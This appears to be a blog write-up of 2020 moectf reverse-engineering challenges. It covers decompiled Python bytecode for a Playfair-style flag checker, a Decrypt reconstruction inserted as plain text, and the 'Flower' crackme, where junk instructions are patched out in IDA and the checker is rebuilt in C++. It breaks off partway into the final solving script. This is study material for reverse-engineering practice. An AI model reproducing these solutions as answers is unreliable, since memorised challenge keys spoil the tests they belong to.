107 188 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 190 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 192 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 194 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 196 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 198 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 200 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 202_204 POP_JUMP_IF_FALSE 268 '</span>to <span class="number">268</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 108 206 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 208 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 210 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 212 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 214 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 216 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 218 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 220 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 222 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 224 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 226 BINARY_SUBTRACT </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 109 228 LOAD_CONST 5</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
108 230 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 232 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 109 234 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 236 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 238 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 240 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 242 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 244 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 246 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 248 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 250 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 252 BINARY_SUBTRACT </span></span><br><span class="line"><span class="string"> 254 LOAD_CONST 5</span></span><br><span class="line"><span class="string"> 256 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 258 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 108 260 BINARY_ADD </span></span><br><span class="line"><span class="string"> 262 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 264 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 266 JUMP_ABSOLUTE 406 '</span>to <span class="number">406</span><span class="string">'</span></span><br><span class="line"><span class="string"> 268_0 COME_FROM 202 '</span><span class="number">202</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
110 268 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 270 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 272 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 274 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 276 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 278 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 280 COMPARE_OP ==</span></span><br><span class="line"><span class="string"> 282_284 POP_JUMP_IF_FALSE 348 '</span>to <span class="number">348</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 111 286 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 288 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 290 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 292 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 294 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 296 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 298 BINARY_SUBTRACT </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 112 300 LOAD_CONST 5</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 111 302 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 304 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
112 306 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 308 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 310 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 111 312 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 112 314 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 316 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 318 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 320 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 322 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 324 BINARY_SUBTRACT </span></span><br><span class="line"><span class="string"> 326 LOAD_CONST 5</span></span><br><span class="line"><span class="string"> 328 BINARY_MODULO </span></span><br><span class="line"><span class="string"> 330 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 332 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 334 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 336 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 338 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
111 340 BINARY_ADD </span></span><br><span class="line"><span class="string"> 342 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 344 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 346 JUMP_ABSOLUTE 406 '</span>to <span class="number">406</span><span class="string">'</span></span><br><span class="line"><span class="string"> 348_0 COME_FROM 282 '</span><span class="number">282</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 114 348 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 350 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 352 LOAD_FAST '</span>x<span class="string">'</span></span><br><span class="line"><span class="string"> 354 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 356 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 358 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 360 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 362 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 364 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 366 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 368 LOAD_FAST '</span>T_lette<span class="string">r'</span></span><br><span class="line"><span class="string"> 370 LOAD_FAST '</span>y<span class="string">'</span></span><br><span class="line"><span class="string"> 372 LOAD_CONST 0</span></span><br><span class="line"><span class="string"> 374 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 376 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 378 LOAD_FAST '</span>x<span 
class="string">'</span></span><br><span class="line"><span class="string"> 380 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 382 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 384 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 386 BINARY_ADD </span></span><br><span class="line"><span class="string"> 388 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 390 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 115 392_394 BREAK_LOOP 406 '</span>to <span class="number">406</span><span class="string">'</span></span><br><span class="line"><span class="string"> 396_0 COME_FROM 100 '</span><span class="number">100</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 116 396 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 398 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 400 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 402 STORE_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 404 JUMP_BACK 72 '</span>to <span class="number">72</span><span class="string">'</span></span><br><span class="line"><span class="string"> 406_0 COME_FROM 82 '</span><span class="number">82</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
117 406 LOAD_FAST '</span>j<span class="string">'</span></span><br><span class="line"><span class="string"> 408 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 410 BINARY_ADD </span></span><br><span class="line"><span class="string"> 412 STORE_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 118 414 JUMP_BACK 32 '</span>to <span class="number">32</span><span class="string">'</span></span><br><span class="line"><span class="string"> 416 JUMP_FORWARD 430 '</span>to <span class="number">430</span><span class="string">'</span></span><br><span class="line"><span class="string"> 418_0 COME_FROM 60 '</span><span class="number">60</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 120 418 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 420 LOAD_FAST '</span>ciphertext<span class="string">'</span></span><br><span class="line"><span class="string"> 422 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 424 BINARY_SUBSCR </span></span><br><span class="line"><span class="string"> 426 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 428 STORE_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 430_0 COME_FROM 416 '</span><span class="number">416</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 
121 430 LOAD_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 432 LOAD_CONST 1</span></span><br><span class="line"><span class="string"> 434 INPLACE_ADD </span></span><br><span class="line"><span class="string"> 436 STORE_FAST '</span>i<span class="string">'</span></span><br><span class="line"><span class="string"> 438 JUMP_BACK 32 '</span>to <span class="number">32</span><span class="string">'</span></span><br><span class="line"><span class="string"> 440_0 COME_FROM 42 '</span><span class="number">42</span><span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> L. 123 440 LOAD_FAST '</span>plaintext<span class="string">'</span></span><br><span class="line"><span class="string"> 442 RETURN_VALUE </span></span><br><span class="line"><span class="string"> -1 RETURN_LAST </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Parse error at or near `JUMP_FORWARD'</span> instruction at offset <span class="number">416</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> key = <span class="string">'YWCNOPJAFGHDTULMQXZEBRVKS'</span></span><br><span class="line"> flag_enc = <span class="string">'WYTFSQOYGYOQKJLHUE'</span></span><br><span class="line"> Create_Matrix(key)</span><br><span class="line"> print(<span class="string">'Please Input flag: '</span>)</span><br><span class="line"> plaintext = <span class="built_in">input</span>()</span><br><span class="line"> <span class="keyword">if</span> plaintext[<span class="number">0</span>:<span class="number">7</span>] != <span class="string">'moectf{'</span> <span class="keyword">or</span> plaintext[(-<span class="number">1</span>)] != <span class="string">'}'</span>:</span><br><span 
class="line"> print(<span class="string">'Ruaaaaa~Wrong!'</span>)</span><br><span class="line"> <span class="built_in">input</span>()</span><br><span class="line"> exit()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> plaintext = plaintext[<span class="number">7</span>:-<span class="number">1</span>]</span><br><span class="line"> flag = Encrypt(plaintext, T_letter)</span><br><span class="line"> <span class="keyword">if</span> flag != flag_enc:</span><br><span class="line"> print(<span class="string">'Ruaaaaa~Wrong!'</span>)</span><br><span class="line"> <span class="built_in">input</span>()</span><br><span class="line"> exit()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print(<span class="string">'Congratulations!'</span>)</span><br><span class="line"> <span class="built_in">input</span>()</span><br><span class="line"> exit()</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Looking at this half-baked code, I kept muttering <code>mmp~~~</code> to myself, but then something clicked: the two functions that did not fully decompile are <code>Encrypt</code> and <code>Decrypt</code>... wait!!! <code>Decrypt</code> is handed to us? It would be a shame not to use the decryption function we were given:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> puzzle</span><br><span class="line"></span><br><span class="line">key = <span class="string">'YWCNOPJAFGHDTULMQXZEBRVKS'</span></span><br><span class="line">cipher = <span class="string">'WYTFSQOYGYOQKJLHUE'</span></span><br><span class="line"></span><br><span class="line">puzzle.Create_Matrix(key)</span><br><span class="line">print(puzzle.T_letter)</span><br><span 
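For anyone who wants to see what the bytecode dump above actually computes rather than just calling it, here is <code>Decrypt</code> written out by hand from that dump, as an added example (this is not the challenge's <code>puzzle.py</code> and not the author's script). It assumes that <code>Create_Matrix</code>, which is not shown here, fills <code>T_letter</code> row by row from the 25-letter key, that the I/J check on <code>ciphertext[i]</code> mirrors the one on <code>ciphertext[j]</code> visible at L. 102-103, and it simplifies the nested i/j loop uncompyle6 gave up on to consecutive pairs; the three arithmetic branches are transcribed exactly as the bytecode has them, including the same-column branch, whose subscripts are in the opposite order from the same-row branch.

```python
# Added example, not the challenge's puzzle.py and not the author's script:
# Decrypt written out by hand from the uncompyle6 bytecode dump above (the
# decompiler stopped with "Parse error at or near JUMP_FORWARD").
# Assumptions (the page does not show them): Create_Matrix fills the 5x5 table
# row by row from the key; the I/J check on ciphertext[i] mirrors the one on
# ciphertext[j] visible at L. 102-103; the nested i/j loop is reduced to
# consecutive pairs, with a lone trailing character copied as-is (L. 120).

KEY = "YWCNOPJAFGHDTULMQXZEBRVKS"      # 25 letters, no I: I is folded onto J
CIPHER = "WYTFSQOYGYOQKJLHUE"          # flag_enc from the challenge's main()


def create_matrix(key):
    """5x5 table, row-major from the key (assumed layout of Create_Matrix)."""
    assert len(key) == 25 and len(set(key)) == 25
    return [list(key[r * 5:(r + 1) * 5]) for r in range(5)]


def get_matrix_index(table, ch):
    """(row, col) of ch in the table, as Get_MatrixIndex returns it."""
    for r, row in enumerate(table):
        if ch in row:
            return r, row.index(ch)
    raise ValueError(f"{ch!r} is not in the table")


def decrypt(ciphertext, table):
    """Branch for branch what the bytecode does for each pair of letters."""
    plaintext = ""
    i = 0
    while i < len(ciphertext):
        if i + 1 >= len(ciphertext):       # no partner left: copy it (L. 120)
            plaintext += ciphertext[i]
            break
        c1, c2 = ciphertext[i].upper(), ciphertext[i + 1].upper()
        x = get_matrix_index(table, "J" if c1 == "I" else c1)   # L. 100 (I/J assumed)
        y = get_matrix_index(table, "J" if c2 == "I" else c2)   # L. 102-105
        if x[0] == y[0]:                                        # same row, L. 107-108
            plaintext += table[x[0]][(x[1] - 1) % 5] + table[y[0]][(y[1] - 1) % 5]
        elif x[1] == y[1]:                                      # same column, L. 110-112
            # transcribed literally: the bytecode indexes [(col-1)%5][row] here,
            # the reverse of the same-row branch; no pair in CIPHER hits this
            plaintext += table[(x[1] - 1) % 5][x[0]] + table[(y[1] - 1) % 5][y[0]]
        else:                                                   # rectangle, L. 114
            plaintext += table[x[0]][y[1]] + table[y[0]][x[1]]
        i += 2
    return plaintext


def solve():
    return decrypt(CIPHER, create_matrix(KEY))


if __name__ == "__main__":
    print(solve())
```

Running it with the key and ciphertext from <code>main()</code> gives the same string that <code>puzzle.Decrypt</code> prints, which is the check that the reconstruction is faithful.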
class="line">print(puzzle.Decrypt(cipher,puzzle.T_letter))</span><br></pre></td></tr></table></figure><p>Huh??? That simple??? Yes, exactly that simple... bet you didn't see that coming <code>~~~</code> la la la <code>~~~</code></p><h3 id="Flower"><a href="#Flower" class="headerlink" title="Flower"></a>Flower</h3><p>Honestly, this one was hard!!! First, thanks to <code>void</code> for guiding me through it; <code>void</code> will always be my big brother!!!</p><p>OK, on to the main part:</p><p><img src="/images/2020moectf-Reverse/image-20201030225634506.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030225634506.png" srcset="" alt="image-20201030225634506"></p><p>Going by the challenge name <code>flower</code>, a blind guess is that this one is about junk instructions (bytes inserted to derail the disassembler). Load it into <code>IDA</code>; the symbols are stripped, so we just try our luck... <code>F12</code> to view the strings. One small point here: we need to make <a href="https://www.jianshu.com/p/b3169f9f5427">IDA display Chinese characters</a>. Use the strings to locate the <code>main</code> function:</p><p><img src="/images/2020moectf-Reverse/image-20201030230348401.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030230348401.png" srcset="" alt="image-20201030230348401"></p><p>Hit <code>F5</code>, then rename a few variables (it is more comfortable that way...) and find the function that processes the data:</p><p><img src="/images/2020moectf-Reverse/image-20201030230904256.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030230904256.png" srcset="" alt="image-20201030230904256"></p><p>The result of this processing is compared against <code>byte_4032AC</code>:<img src="/images/2020moectf-Reverse/image-20201031000410037.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031000410037.png" srcset="" alt="image-20201031000410037"></p><p>Follow <code>off_4032A4</code>:<img src="/images/2020moectf-Reverse/image-20201030231003639.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030231003639.png" srcset="" alt="image-20201030231003639"></p><p>Following the two functions in turn, <code>loc_401310</code> contains junk instructions:<img src="/images/2020moectf-Reverse/image-20201030231616691.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030231616691.png" srcset="" 
alt="image-20201030231616691"></p><p>We patch it by hand and turn the byte at <code>40133B</code> into a <code>nop</code>: click on <code>40133B</code>, press <code>U</code> (undefine), switch to <code>hex-view</code>, <code>F2</code> to edit the <code>74</code> (the <code>jz</code> opcode) to <code>90</code> (<code>nop</code>), <code>F2</code> to save, switch back to <code>IDA view</code>, press <code>C</code> (make code), click on <code>401310</code>, press <code>P</code> (make function):<img src="/images/2020moectf-Reverse/image-20201030232022281.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030232022281.png" srcset="" alt="image-20201030232022281"></p><p><img src="/images/2020moectf-Reverse/image-20201030232115839.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201030232115839.png" srcset="" alt="image-20201030232115839"></p><p>This function is equivalent to the following (XOR each byte with <code>0x16</code>, then swap its two nibbles; <code>input</code> is an array of <code>unsigned char</code>, so the store truncates to one byte):</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> input[i] = <span class="number">16</span> * (input[i] ^ <span class="number">0x16</span>) | ((input[i] ^ <span class="number">0x16</span>) >> <span class="number">4</span>);</span><br></pre></td></tr></table></figure><p>Then follow <code>sub_4011B0</code>:</p><p><img src="/images/2020moectf-Reverse/image-20201031000853428.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031000853428.png" srcset="" alt="image-20201031000853428"></p><p>Then look at <code>off_404018</code>:<img src="/images/2020moectf-Reverse/image-20201031000930019.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031000930019.png" srcset="" alt="image-20201031000930019"></p><p>Follow <code>loc_4012B0</code>: junk instructions again, the same as before, handled as described above:<img src="/images/2020moectf-Reverse/image-20201031001257387.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031001257387.png" srcset="" 
alt="image-20201031001257387"></p><p>Follow <code>loc_401240</code>: junk instructions too, cleaned up:<img src="/images/2020moectf-Reverse/image-20201031001450275.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031001450275.png" srcset="" alt="image-20201031001450275"></p><p>Follow <code>loc_401270</code>: junk instructions yet again, cleaned up:<img src="/images/2020moectf-Reverse/image-20201031001650795.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031001650795.png" srcset="" alt="image-20201031001650795"></p><p>At this point we have essentially analysed the whole program, so let's lay out its flow: <code>main</code> calls <code>func1(loc_401310)</code> and <code>func2(sub_4011B0)</code>; <code>func2</code> in turn calls <code>fun0(sub_4012B0)</code>, <code>fun1(sub_401240)</code> and <code>fun2(sub_401270)</code>, and then returns through <code>sub_4012D0</code>. Finally the result is compared with <code>byte_4032AC</code>. We now need to work out what <code>sub_4012D0</code> does; first let <code>IDA</code> try:</p><p><img src="/images/2020moectf-Reverse/image-20201031003310883.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031003310883.png" srcset="" alt="image-20201031003310883"></p><p>That does not look workable... switch to dynamic debugging:</p><p><img src="/images/2020moectf-Reverse/image-20201031010220818.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031010220818.png" srcset="" alt="image-20201031010220818"></p><p><code>F9</code> to run, enter <code>0123456789abcdef</code>, and record the data at the breakpoint:</p><p><img src="/images/2020moectf-Reverse/image-20201031010436913.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031010436913.png" srcset="" alt="image-20201031010436913"></p><p>This shows the function is just XORing byte by byte; the values XORed into the successive positions are 77, 76, 71, 80, 75, 70, 67, 74, 69, 78, 73, 72, 68, 66, 65 (decimal; fifteen values, so the sixteenth byte is left alone). Now we can write a program with the same flow to help us understand it (and to make brute-forcing convenient, doge.jpg):</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span 
class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> input[<span class="number">20</span>];</span><br><span class="line"><span class="keyword">int</span> rel[<span class="number">20</span>]={<span class="number">62</span>,<span class="number">254</span>,<span class="number">153</span>,<span class="number">118</span>,<span class="number">139</span>,<span class="number">220</span>,<span class="number">13</span>,<span class="number">24</span>,<span class="number">50</span>,<span class="number">120</span>,<span class="number">111</span>,<span class="number">191</span>,<span class="number">67</span>,<span class="number">116</span>,<span class="number">51</span>,<span class="number">115</span>};</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">fun0</span><span class="params">(<span class="keyword">int</span> x1,<span class="keyword">int</span> x2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">input[x1] += x2;</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">fun1</span><span class="params">(<span class="keyword">int</span> x1,<span class="keyword">int</span> x2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">input[x1] ^=input[x2];</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">fun2</span><span class="params">(<span class="keyword">int</span> x1,<span class="keyword">int</span> x2)</span></span></span><br><span class="line"><span 
class="function"></span>{</span><br><span class="line">input[x1] = <span class="built_in">abs</span>(input[x1]-input[x2]);</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">} </span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">func1</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> {</span><br><span class="line"> input[i] = <span class="number">16</span> * (input[i] ^ <span class="number">0x16</span>) | ((input[i] ^ <span class="number">0x16</span>) >> <span class="number">4</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">func2</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">fun0(<span class="number">0</span>,<span class="number">1</span>);</span><br><span class="line">fun1(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line">fun2(<span class="number">2</span>,<span class="number">3</span>);</span><br><span class="line">fun1(<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line">fun2(<span class="number">4</span>,<span class="number">5</span>);</span><br><span class="line">fun0(<span class="number">5</span>,<span class="number">6</span>);</span><br><span class="line">fun0(<span class="number">6</span>,<span class="number">7</span>);</span><br><span class="line">input[<span class="number">0</span>]^=<span class="number">0x4D</span>;</span><br><span 
class="line">input[<span class="number">1</span>]^=<span class="number">0x4C</span>;</span><br><span class="line">input[<span class="number">2</span>]^=<span class="number">0x47</span>;</span><br><span class="line">input[<span class="number">3</span>]^=<span class="number">0x50</span>;</span><br><span class="line">input[<span class="number">4</span>]^=<span class="number">0x4B</span>;</span><br><span class="line">input[<span class="number">5</span>]^=<span class="number">0x46</span>;</span><br><span class="line">input[<span class="number">6</span>]^=<span class="number">0x43</span>;</span><br><span class="line">input[<span class="number">7</span>]^=<span class="number">0x4A</span>;</span><br><span class="line">input[<span class="number">8</span>]^=<span class="number">0x45</span>;</span><br><span class="line">input[<span class="number">9</span>]^=<span class="number">0x4E</span>;</span><br><span class="line">input[<span class="number">10</span>]^=<span class="number">0x49</span>;</span><br><span class="line">input[<span class="number">11</span>]^=<span class="number">0x48</span>;</span><br><span class="line">input[<span class="number">12</span>]^=<span class="number">0x44</span>;</span><br><span class="line">input[<span class="number">13</span>]^=<span class="number">0x42</span>;</span><br><span class="line">input[<span class="number">14</span>]^=<span class="number">0x41</span>;</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="built_in">cin</span>>>input;</span><br><span class="line"> <span class="keyword">if</span>(<span class="built_in">strlen</span>((<span class="keyword">char</span> *)input)<<span class="number">16</span>)</span><br><span class="line"> <span class="keyword">return</span> <span 
class="number">0</span>;</span><br><span class="line">func1();</span><br><span class="line">func2();</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> <span class="keyword">if</span>(input[i]!=rel[i])</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> <span class="built_in">cout</span><<<span class="string">"you're right"</span>;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Now, if you cannot be bothered to invert it, you could try brute force: 16 bytes, good luck (doge)</p><p>So we just invert it and we are done; nothing more to say, here is the script:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span 
